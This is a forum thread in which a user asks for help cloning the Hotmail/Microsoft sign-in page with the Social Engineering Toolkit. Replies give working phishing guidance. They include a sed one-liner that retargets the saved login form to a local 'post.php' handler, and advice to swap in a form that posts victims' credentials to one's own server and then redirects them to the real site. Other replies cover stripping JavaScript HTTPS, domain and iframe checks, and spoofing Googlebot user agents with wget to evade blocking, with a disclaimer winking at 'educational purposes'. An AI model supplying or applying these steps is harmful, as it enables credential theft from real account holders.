Social engineering toolkit hotmail cloning = blank page


Recommended Posts

Hello, I have been a SET user for a long time. Recently I tried the website attack vector's site cloning, and everything seems to work well until I try to clone the Hotmail page: no matter what I try, I get a blank page. It loads and shows up in SET, but all I get is blank. I also tried saving an offline copy, and the only way to get anything is to save as HTML only, NOT a complete web page, and even then the sign-in bars are tiny and not cloned correctly. Can anyone please give me some advice or help? I am stumped. Please and thanks.


Is hotmail even still a site, though? Is that the URL you enter in SET? I think they moved it to outlook.com, and hotmail.com redirects me to live.com, so maybe what you entered is the issue. Try cloning another site. If it's still borked, either there's a bug in the latest release, or you need to check the config file to see whether the option is commented out or enabled for cloning. I think the site cloner is on by default as one of the options, though, and doesn't require editing the config (at least I don't recall it needing any changes or uncommenting to enable site cloning, only for choosing payloads).

Forgot: you can also use the contact form on his site, https://www.trustedsec.com/contact-us/, if you don't have Twitter, or hit up their IRC channel and see if anyone can help. Although, I hear some of the people there can be less than helpful if it's something that was overlooked in the documentation.

Edited by digip

1.- Try the actual full URL you land on AFTER typing www.hotmail.com into your browser; the URL to copy would now become...


2.- Notice that if you try facebook.com, the login page is different from the actual login page with SET. For example, when you type facebook.com in your browser you get the login at the top, but if you use SET you get the login in the middle. I think, I THINK... it's because of JavaScript, cookies and all that stuff that SET won't be able to copy.

With that in mind, it's no surprise that you can't copy hotmail directly.

Best Regards


I have already tried copying the direct link as you stated above, with no luck. I tried all the variables before posting for help so I don't look stupid. Thanks for the reply, but I have tried the full URL after going to the site, and the same thing happens: blank page.


Updated, and still no difference.

One thing you can try is creating the page manually: save it locally, then insert your payload code or Java applet, if that's the attack you are using. File > Save As > index.html, then edit your script to serve that page or something. You can also use wget to spider pages, or HTTrack, but change the default user agents when using wget and HTTrack, as many sites block them. On my own site, I block specific ones and redirect them since they are tools known for hacking: sqlmap, HTTrack, libwww/perl, even "Java" as a user agent, yeah, block it.

What exactly is wget for spidering pages? I googled it, and to my understanding it's a web crawler? Any direction to point me in would be great, thanks.

I have tried using the page offline. It looked good when saved as HTML only, but saved as a complete page it didn't work, and the HTML-only version didn't log the information.


You'd probably have to modify the saved page to add in the code that Dave injects into cloned pages to gather the login details.
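To make that idea concrete, here's a minimal sketch of retargeting a saved login form so it posts to your own handler. The live.com endpoint and the "post.php" name are placeholders for illustration; in practice SET injects its own harvester code automatically.

```shell
#!/bin/sh
# Stand-in for the index.html you saved from the browser (hypothetical markup).
cat > /tmp/saved.html <<'EOF'
<form id="login" action="https://login.live.com/ppsecure/post.srf" method="post">
</form>
EOF

# Rewrite the form's action attribute to point at a local handler instead.
sed 's|action="[^"]*"|action="post.php"|' /tmp/saved.html > /tmp/edited.html
cat /tmp/edited.html
```

The same one-liner approach works for stripping other attributes (e.g. `onsubmit` handlers) before serving the page from your test box.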

On the wget side, it's a tool available for many operating systems, with versions for Linux, Windows and OS X. It's usually installed on most Linux distros by default, but easy to install otherwise.

A simple command would be "wget http://www.somesite.com/index.html -O file.html", for example, to save to file.html. Read the help; it shows how to add a user agent, accept cookies, handle SSL, etc.


I understand wget, just not spidering pages. I'll do some research since I am not sure how to do any of that. I feel like a moron for not knowing this stuff.

Read the quote next to my name: "we're all just neophytes". Nobody can know everything, and if you've never heard of or used wget, you're not a moron. wget is an HTTP download tool, though, and can do a lot more than just download a page. It can spider (crawl) a whole site, downloading all images, files, etc. for offline viewing. I use it on Windows for various things; combined with bat scripts and a little VBS, I use it to download RSS feeds of podcasts and videos, and all sorts of stuff. It can even be scripted as an attack tool depending on what you are doing, like brute-forcing a login page, if you get that deep with it, but there are other tools that already automate a lot of that, so no need to reinvent the wheel.

wget is the go-to tool for a quick mirror of a site, though. Just know that some sites block wget, so you can add command switches to set a fake user agent and look like Googlebot or such.
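As a quick sketch of the user-agent spoofing described above: the fetch below pretends to be Googlebot. To stay self-contained it serves a throwaway page locally instead of hitting a real site; the port, paths, and page content are all arbitrary.

```shell
#!/bin/sh
# Serve a throwaway test page on localhost so the example runs offline.
mkdir -p /tmp/wgetdemo
echo '<html><body>hello</body></html>' > /tmp/wgetdemo/index.html
( cd /tmp/wgetdemo && exec python3 -m http.server 8123 ) >/dev/null 2>&1 &
SRV=$!
sleep 1

# Spoof Googlebot so user-agent filters let the request through.
wget -q -O /tmp/wgetdemo/mirror.html \
  --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
  http://127.0.0.1:8123/index.html

kill $SRV
grep hello /tmp/wgetdemo/mirror.html
```

For mirroring a whole site rather than one page, the same `--user-agent` switch combines with wget's `--mirror`, `--convert-links`, and `--page-requisites` options.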

Example script I use when checking headers and following spam links (Windows bat script; just never save the bat file as wget.bat, or it won't run.. lol):

@echo off
cd desktop
:top

:: (ASCII art banner omitted -- the original DOS box-drawing characters were mangled by the forum's encoding)

::debug is optional, but helps to get as much returned info as possible.
ECHO [Wget Webpage (with Headers + Cookies) from what site?]
SET /P website="[example: www.google.com] : "

:: Page with LOTS of User Agent examples - http://www.user-agents.org/
:: crawler@alexa.com to spoof as Alexa statistic bot
:: Opera/9.24 (Windows NT 5.1; U; en) if you want to spoof as Opera for Windows XP
:: GoogleBot Spoof because some sites require subscription access, but allow googlebot to index its pages.
:: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
:: QuickTime\xaa.7.0.4 (qtver=7.0.4;cpu=PPC;os=Mac 10.3.9)
:: IE6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
:: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
:: Apache/2.2.3 (CentOS) (internal dummy connection)
::wget --save-headers --save-cookies %website%.cookie.txt %website% --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" -d -o debug.txt

:: iPhone user Agent Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
wget -d -o debug.txt --save-headers --save-cookies "%website%".cookie.txt "%website%" --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" --no-check-certificate

::Google User Agent Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
::wget %website% --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" -d -o debug.txt

SET /P yn="Continue or Quit? C/Q: "
if "%yn%" == "q" goto:end
if "%yn%" == "c" goto:top
if "%yn%" == "Q" goto:end
if "%yn%" == "C" goto:top

::In case they didn't pick from the above selections
echo Wrong Selection. Please choose C or Q

SET /P yn="Continue or Quit? C/Q: "
if "%yn%" == "q" goto:end
if "%yn%" == "c" goto:top
if "%yn%" == "Q" goto:end
if "%yn%" == "C" goto:top


Thanks again for the reply, I will take a look at it and have a go. I'll do some research on wget and stripping pages. I am frustrated with myself for not knowing this stuff better. I appreciate the help from everyone.

Like digip said, it takes time to learn all of these things. I used to set up a list of documents and vids to get through each day so that I would continuously learn. Keeping up on Twitter feeds for projects is a great idea too. Also try taking on a scripting project a little outside your comfort zone; this helps you learn to research and problem solve. Don't be discouraged, even the best minds had to start somewhere!


This SET issue is just kicking my butt; I have failed at every attempt to make this work, lol. I looked up wget commands and ended up saving it as an offline page, and got the same issue as saving it with the browser. Nevertheless, I have learned something new, which is great. It seems like a JavaScript redirect or something, I don't know. I'm for sure at a standstill at the moment. Thanks again for all the help and patience.


Microsoft does implement cross-domain checking, but that's usually server-side header checks. If JavaScript in the page is checking your URL for the location, it might also redirect. So saving offline means you need to open it in a text editor as well and edit out things like that, or save the scripts offline if part of one is required to make the page load, and remove the checks for HTTPS, for being on the domain, for being loaded in iframes, etc. It's a learning process, but take it as a good thing, since Microsoft is increasing security to protect against attacks.


Not sure, but anything JS-file-wise, really: just replace the login form with your own form that posts the data to your own web server to capture info, then redirect them to the real site afterwards. You can probably strip most of the JS stuff unless it's for displaying, and just insert your own HTML form that posts to a PHP file to log stuff. Do it the old-fashioned way; you just have to be able to serve it to the target machine without it redirecting before they enter anything. Check the head and footer areas for script tags, and poke around the code to see what it's loading remotely. Things like:

<script src="http://site.com/file.js"></script>
That type of stuff. You'd need to inspect those files to see if any of them do cross-domain checking or check whether they're loaded in iframes.

All for educational purposes of course, you know, testing out on local VMs and whatnot to see how to do it. ;)
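A quick way to do the "poke around the code" step above is to grep the saved page for what it loads remotely before deciding what to strip. The HTML below is a made-up stand-in for a saved login page; the domains are invented.

```shell
#!/bin/sh
# Fake saved page with one external script and one inline redirect check.
cat > /tmp/page.html <<'EOF'
<html><head>
<script src="https://auth.example.com/check.js"></script>
<script>if (location.protocol != "https:") location = "https://example.com/";</script>
</head><body><form action="/post"></form></body></html>
EOF

# External scripts worth inspecting for cross-domain or redirect checks:
grep -o '<script src="[^"]*"' /tmp/page.html

# Inline code touching location is usually the redirect logic to edit out:
grep -n 'location' /tmp/page.html
```

Anything the first grep turns up would need to be saved locally (or removed) too, since a cloned page that still loads scripts from the real domain can redirect or break.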


When I go to inspect the HTML I saved from hotmail, it says this:

Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.

To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.

